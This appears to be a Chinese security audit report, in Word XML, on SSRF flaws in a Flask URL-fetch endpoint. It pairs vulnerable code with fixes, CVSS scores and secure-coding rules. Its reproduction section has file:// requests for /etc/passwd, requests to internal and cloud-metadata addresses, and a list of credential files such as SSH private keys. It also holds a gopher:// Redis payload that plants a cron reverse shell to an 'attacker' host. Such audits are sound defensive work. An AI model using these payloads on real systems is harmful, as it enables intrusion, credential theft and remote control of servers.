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F4EB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SSRF服务端请求伪造漏洞安全分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435F49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一、项目背景</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3B77F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vaUser是一款基于Flask框架开发的轻量化现代化用户管理系统，核心业务涵盖用户账号登录校验、个人信息维护、头像资源上传、账户余额充值、登录密码修改等基础功能。为拓展平台业务能力，系统近期迭代新增了远程URL内容抓取接口，授权登录用户可自主输入外部URL地址，由服务端发起请求并获取对应页面内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E215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本次安全专项审计针对该新增的URL抓取功能开展，聚焦服务端请求伪造（SSRF）安全风险，全面排查接口安全隐患，完成漏洞复现、风险定级、危害分析，并输出可落地的漏洞修复方案与安全开发规范。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A1E52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二、漏洞概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="387D5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本次对系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/fetch-url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接口的全方位安全检测，累计发现5项安全缺陷，其中包含3项高危漏洞、2项中危漏洞。各类漏洞可被攻击者串联利用，构建出从本地敏感文件读取、内网服务探测到内网横向渗透的完整攻击链路，对服务器及内网业务环境造成严重安全威胁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ACA9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53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0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7C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BE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CVSS评分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B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</w:tr>
      <w:tr w14:paraId="1FB89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D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VULN-SSRF-001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AC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URL协议校验缺失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1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安全配置不当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CE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17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7547C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B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VULN-SSRF-002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7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内网私有地址无访问拦截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74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访问控制失效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6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20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1EAE9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2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VULN-SSRF-003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0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服务器本地任意文件读取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FE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授权机制绕过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B7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2E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64720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C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VULN-SSRF-004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76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URL合规校验机制缺失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C8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安全配置不当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46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91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  <w:tr w14:paraId="12BF2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8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VULN-SSRF-005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C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接口请求无频率限制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D4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安全设计缺陷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18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3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</w:tbl>
    <w:p w14:paraId="4085AA8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三、漏洞环境说明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A7BE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C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检测项目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B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详细内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11AAE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7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目标检测系统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0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NovaUser用户管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B75A4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17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漏洞关联文件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A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app.py （/fetch-url 路由接口）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0154DA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9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漏洞触发条件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71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登录系统后，通过POST请求提交恶意url参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="545E6A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A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受影响版本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74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所有未完成安全修复的系统版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52DDD0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1D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5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3.13、Flask 3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DE06C06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四、SSRF漏洞原理介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="659D7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请求伪造（SSRF）是一类常见的服务端安全漏洞，核心风险根源为服务端直接信任用户可控的输入参数，未对用户提交的URL地址做严格的过滤、校验与拦截，导致攻击者可操控服务器主动发起各类网络请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C318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业务场景下，接口仅需请求外部合法HTTP/HTTPS资源，而存在漏洞的服务端可被诱导访问内网私有地址、本地系统文件、云服务器元数据接口等受限资源，进而引发信息泄露、内网探测、服务攻击等一系列安全风险。常见漏洞利用方式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A36E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借助file://协议读取服务器本地任意文件，窃取系统配置、账号密码、源码等敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1044B1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通过http/https协议遍历访问内网主机及端口，梳理内网拓扑结构、探测存活服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D43B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利用gopher://协议构造自定义TCP数据包，对内网Redis、MySQL等核心服务发起攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06462B8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通过dict://协议对内网端口进行批量探测，识别开放服务端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D526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访问各类云厂商元数据接口，窃取云服务器临时权限凭证，实现云资源越权操控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D943F7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五、漏洞详细分析与复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3EF3450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5.1 VULN-SSRF-001：URL协议校验缺失（高危）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="424BD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漏洞位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：app.py 文件 /fetch-url 路由（161-175行）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77408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漏洞核心代码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9E7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0233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@app.route("/fetch-url", methods=["POST"])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fetch_url():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"username" not in session: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redirect("/login")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target_url = request.form.get("url",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 = urllib.request.Request(target_url)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resp = urllib.request.urlopen(req, timeout=10)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body = resp.read().decode("utf-8", errors="replace")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63682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漏洞成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：系统直接将用户传入的URL参数带入请求函数，未对URL的传输协议做白名单校验。Python urllib库原生支持file、ftp、gopher等多种高危协议，攻击者可利用非HTTP/HTTPS协议突破访问限制，触发恶意请求行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561A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漏洞复现方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：通过POST接口提交携带file协议的恶意URL，读取服务器本地系统文件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215B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32D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/fetch-url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Content-Type: application/x-www-form-urlencoded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url=file:///etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A141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预期返回结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：服务端成功读取系统用户配置文件，返回root、daemon、www-data等系统账号信息，造成用户信息泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180933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5.2 VULN-SSRF-002：内网私有地址无访问拦截（高危）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5A547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漏洞成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：接口未配置内网地址拦截规则，未对目标访问IP做合规校验，允许服务端主动访问本地回环地址（127.0.0.1）、Docker内网地址（172.17.0.1）、局域网私有网段（10.x.x.x、192.168.x.x）及云服务器元数据私有地址。攻击者可利用该漏洞批量探测内网存活主机与开放端口，梳理内网资产拓扑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB6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漏洞复现方式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14D5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F1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探测本地主机80端口服务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/fetch-url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url=http://127.0.0.1:80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探测Docker内网核心服务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/fetch-url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url=http://172.17.0.1:80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读取AWS云服务器元数据信息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/fetch-url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url=http://169.254.169.254/latest/meta-data/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EEFD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实际测试结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：服务端可正常访问本地80端口Apache服务、Docker内网172.17.0.1端口HTTP服务，同时可请求各类云元数据接口，内网探测风险完全暴露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA685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5.3 VULN-SSRF-003：服务器本地任意文件读取（高危）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4F0C4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漏洞成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：结合协议校验缺失漏洞，攻击者可通过file协议无权限限制读取服务器本地所有文件，窃取核心业务数据、系统配置及密钥信息，直接威胁服务器安全。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475D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高危可读取文件及风险说明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05E9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2F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11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泄露核心信息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C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危害等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E1EA4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9C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/etc/passwd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1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系统全部用户账号列表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E5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  <w:tr w14:paraId="79806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D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/etc/shadow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7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系统用户密码哈希值，可暴力破解登录密码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3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</w:tr>
      <w:tr w14:paraId="2D931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72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/etc/nginx/nginx.conf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B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Web服务路由、端口、权限配置信息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DB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140A49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69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A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系统核心业务源码、逻辑漏洞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6D0DA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C4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E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数据库账号密码、云服务密钥AK/SK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0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</w:tr>
      <w:tr w14:paraId="1D4D3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1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/root/.ssh/id_rsa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4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服务器SSH登录私钥，可远程控制服务器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4A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</w:tr>
      <w:tr w14:paraId="088CC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37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/proc/self/environ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A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系统环境变量、核心配置参数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B2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</w:tbl>
    <w:p w14:paraId="09F50E7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5.4 VULN-SSRF-004：URL合规校验机制缺失（中危）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2BC83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漏洞成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：系统未设置任何URL校验规则，既无合法访问域名白名单，也无恶意协议、高危地址黑名单。所有登录用户均可通过该接口，随意访问外网恶意站点、内网私有服务，不仅存在内网探测风险，还可被用于发起SSRF反射攻击，牵连服务器成为攻击跳板机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632717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5.5 VULN-SSRF-005：接口请求无频率限制（中危）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="44E13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漏洞成因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：接口未设计请求频率管控机制，无单IP、单账号请求次数限制。攻击者可通过脚本批量、高频调用接口，对内网开展全端口扫描、目录爆破、服务探测，大幅提升内网渗透成功率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10720A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六、综合攻击链路分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0AC41A9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6.1 攻击链路一：SSRF漏洞打通服务器全权限控制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6A37C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漏洞利用流程：高危SSRF漏洞探测验证 → 本地敏感文件读取 → 核心配置与源码泄露 → 内网服务探测 → 内网服务恶意攻击 → 获取服务器权限 → 内网横向移动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F7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详细步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2370458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攻击者探测发现系统/fetch-url接口存在SSRF漏洞；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357524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通过file:///etc/passwd读取系统文件，确认漏洞可利用；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624E5B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读取Nginx配置文件，获取Web服务部署与路由信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380C3A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读取系统源码，窃取数据库连接账号、密码等核心凭证；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032D88E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扫描内网172.17.0.1网段，探测到Redis核心服务开放；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC2BC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通过gopher协议构造恶意数据包，向Redis写入SSH公钥；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8799A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成功获取服务器远程Shell控制权限；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318587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以当前服务器为跳板，对内网其他主机开展横向渗透攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431EED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6.2 攻击链路二：SSRF+Gopher协议攻击内网Redis服务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="081E6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攻击者可通过gopher协议封装Redis恶意指令，利用SSRF漏洞由服务端代为执行，实现定时任务写入、反弹Shell等恶意操作，核心攻击载荷如下：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348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549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gopher://172.17.0.2:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a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0d%0a%0d%0a*/1 * * * * bash -i &gt;&amp; /dev/tcp/attacker/4444 0&gt;&amp;1%0d%0a%0d%0a%0a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*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adir%0d%0a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/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0a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dbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AF18D2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6.3 攻击链路三：SSRF漏洞窃取云服务器权限凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6935B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主流云服务器均提供内网元数据接口，无访问权限限制，攻击者可通过SSRF漏洞请求对应接口，获取云服务器临时访问凭证，接管云资源权限：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E80E2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阿里云元数据接口：http://100.100.100.200/latest/meta-data/ram/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC423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AWS云元数据接口：http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A33F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腾讯云元数据接口：http://metadata.tencentyun.com/latest/meta-data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B655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本次实测中，上述接口均出现解析失败，核心原因为系统拦截了异常响应，但漏洞风险依然存在，攻击者可更换请求方式绕过限制，窃取云凭证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A9D7D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七、CVSS 3.1漏洞评分详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="534D9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本次所有漏洞均采用CVSS 3.1评分标准，各维度评分及风险等级如下：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14:paraId="4B989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AB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9D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攻击路径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B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攻击复杂度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A1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权限要求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2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用户交互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F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作用域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7C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保密性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B9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D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1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E6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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D2F8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B8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SSRF-001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39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7E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7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7B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3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未变更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17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10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B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1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7C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48FDA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0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SSRF-002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E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EE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B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E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88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已变更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D4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C4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1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26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16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4CB70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86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SSRF-003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7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EB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9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9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1F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未变更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78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5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A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A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8.6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E0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2E404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9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SSRF-004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A2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E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D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55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5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未变更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2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6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C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1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3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  <w:tr w14:paraId="2CFA5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F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71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0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1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DB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B3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未变更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A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4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E9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3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2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</w:tbl>
    <w:p w14:paraId="00C957F7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八、漏洞修复方案与落地代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="564E47C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8.1 协议白名单管控（修复SSRF-001、SSRF-003）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="76EB8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仅放行合法的HTTP、HTTPS协议，拦截file、gopher、ftp等所有高危协议，从根源杜绝本地文件读取、自定义TCP请求等恶意利用方式。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ECC6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F7C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urllib.parse import urlparse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validate_url_protocol(url):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"""校验URL协议合法性，仅允许http/https"""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parsed = urlparse(url)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ALLOWED_SCHEMES = ["http", "https"]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parsed.scheme not in ALLOWED_SCHEMES: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ValueError(f"不支持的请求协议: {parsed.scheme}")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parsed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CA9E30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8.2 内网高危地址黑名单拦截（修复SSRF-002）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="033BF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批量拦截本地回环地址、内网私有网段、链路本地地址及广播地址，禁止服务端向内网发起任何请求，杜绝内网探测与横向渗透风险。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19F8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B51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socket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ipaddress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is_private_address(url):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"""判断目标地址是否为内网受限地址"""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hostname = urlparse(url).hostname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 = socket.gethostbyname(hostname)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addr = ipaddress.ip_address(ip)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拦截本地、内网、链路本地及无效地址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(addr.is_private or addr.is_loopback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or addr.is_link_local or ip == "0.0.0.0")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except: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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="639AA7B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8.3 修复后完整安全代码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C43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4573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@app.route("/fetch-url", methods=["POST"])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fetch_url():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"username" not in session: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redirect("/login")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target_url = request.form.get("url",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target_url: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"请输入有效的URL地址"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第一层防护：协议白名单校验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validate_url_protocol(target_url)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第二层防护：内网地址拦截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is_private_address(target_url):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"禁止访问内网受限地址"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安全发起外部请求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req = urllib.request.Request(target_url,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headers={"User-Agent": "Mozilla/5.0"})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resp = urllib.request.urlopen(req, timeout=10)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body = resp.read().decode("utf-8", errors="replace")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限制响应长度，避免超大内容加载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body[:5000]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f"URL请求失败: {str(e)}"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42BC5DA6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8.4 修复措施效果对比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6DB4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4E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5C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防护漏洞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4F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E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防护效果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53E82E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98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URL协议白名单校验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F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SSRF-001、SSRF-003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E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极低（5行代码）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9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彻底杜绝文件读取、高危协议攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72F33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6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内网地址黑名单拦截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04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24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极低（10行代码）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34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完全拦截内网探测与横向攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1BDE5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A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自定义URL白名单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62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D9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极低（5行代码）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6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限制合法访问域名，提升安全性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63850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D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接口请求频率限制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BC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A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低（15行代码）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6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防范批量扫描、爆破攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07053DF2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九、OWASP Top10 2021风险类别映射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AE0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F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CE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对应OWASP 2021类别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4E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风险说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="41DE7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8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A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A05：安全配置错误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1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未限制URL请求协议，开放高危协议调用权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="404133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F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27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A01：访问控制失效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3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未拦截内网私有地址，导致内网资产暴露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6AFE6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CA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F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A01：访问控制失效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82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绕过文件访问权限，实现本地任意文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E8CF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4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6E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A05：安全配置错误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0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无任何URL校验规则，允许任意地址请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38908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7F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46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A04：不安全的设计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7D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接口设计未考虑防暴力、防批量攻击机制</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CEE08E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十、漏洞修复优先级规划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5E58B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C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F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46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A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9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风险影响说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="15F41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DA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P0紧急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B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9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6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5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可读取服务器源码、密钥、密码等核心数据，危害极高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B63B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F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P0紧急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B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9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12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泄露内网拓扑，可被用于内网横向渗透，威胁全网安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6472F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96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P1高危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03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A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1周内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8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71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高危协议无限制，是文件读取漏洞的核心前置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E5C09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9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P2中危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A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9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1个月内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8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2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无URL校验机制，存在反射攻击、恶意请求风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2818E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5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P2中危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8A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SSRF-005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E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1个月内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5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E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无频率限制，易被批量利用开展扫描攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12DAA376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十一、URL抓取功能安全开发规范</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="3B830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为规避同类SSRF漏洞复发，后续开发URL远程抓取、资源拉取类功能时，需严格遵循以下安全规范：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084662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强制开启协议白名单，仅放行http、https协议，拦截所有其他高危协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2958228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全面拦截内网私有地址、本地回环地址、云元数据特殊地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E7D5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设置合理的接口请求超时时间，建议5-10秒，避免超时滥用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4182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新增接口限流机制，单IP/单账号每分钟请求次数不超过10次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A2FB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规范错误返回信息，禁止泄露内网IP、端口、拓扑等敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975012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按需配置访问域名白名单，仅允许业务可信域名访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A191ED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限制接口响应内容最大长度，避免超大资源加载引发风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516427C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完整记录接口请求日志，包含请求URL、IP、时间、结果，便于安全审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4343A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优先使用专业渲染服务替代原生urllib库，降低原生库安全风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258A240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十二、总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="7350D5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安全审计排查出NovaUser系统URL抓取功能存在5项安全缺陷，包含3项高危SSRF漏洞，整体安全风险极高。核心安全问题集中在服务端过度信任用户输入参数，未做任何协议、IP、请求频次的安全校验，直接将用户可控参数带入核心请求函数，导致漏洞可被全方位利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C87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漏洞核心危害涵盖：本地任意文件读取、系统敏感数据泄露、内网资产探测、内网服务攻击、云凭证窃取，攻击者可串联漏洞完成从信息收集到服务器控权、内网横向移动的完整攻击链路。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B6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提供的修复方案极简且高效，仅需核心三行代码即可封堵主要高危漏洞：一是通过协议白名单拦截file等高危协议，杜绝文件读取风险；二是校验目标IP地址，拦截所有内网私有地址请求，杜绝内网探测与渗透风险。配套的限流、域名校验、日志审计等防护措施，可全方位加固接口安全，彻底解决本次发现的全部安全隐患。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C9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272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219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F377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4157</Words>
  <Characters>6931</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7363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2026-07-15T09:37:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>WPS_1762492943</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-15T09:37:51Z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{"Label":"1","ContentProducer":"001191110102MACQD9K64010000","ProduceID":"7662686480382479646","ReservedCode1":"","ContentPropagator":"","PropagateID":"","ReservedCode2":""}</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.26381</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>D27D55D120E549D6A80D9D5C11E216A5_13</vt:lpwstr>
  </property>
</Properties>
</file>